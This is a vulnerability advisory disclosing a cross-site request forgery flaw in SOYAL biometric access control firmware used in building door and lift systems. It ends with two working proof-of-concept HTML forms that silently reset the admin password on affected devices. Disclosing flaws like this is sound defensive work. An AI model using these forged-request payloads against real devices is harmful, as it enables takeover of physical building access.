SOYAL Biometric Access Control System 5.0 CSRF Change Admin Password Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: AR-727 i/CM - F/W: 5.0 AR837E/EF - F/W: 4.3 AR725Ev2 - F/W: 4.3 191231 AR331/725E - F/W: 4.2 AR837E/EF - F/W: 4.1 AR-727CM /i - F/W: 4.09 AR-727CM /i - F/W: 4.06 AR-837E - F/W: 3.03 Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: SOYAL Technology WebServer 2.0 SOYAL Serial Device Server 4.03A SOYAL Serial Device Server 4.01n SOYAL Serial Device Server 3.07n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5632 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php 25.01.2021 -- <html> <body> <form action="http://192.168.1.1/userset.cgi" method="POST"> <input type="hidden" name="pw" value="test123" /> <input type="hidden" name="pw2" value="test123" /> <input type="submit" value="Forge me!" /> </form> </body> </html> ... <html> <body> <form action="http://192.168.1.2/LoginUser.cgi" method="POST"> <input type="hidden" name="pw" value="drugtest123" /> <input type="hidden" name="pw2" value="drugtest123" /> <input type="submit" value="Forge me!" /> </form> </body> </html>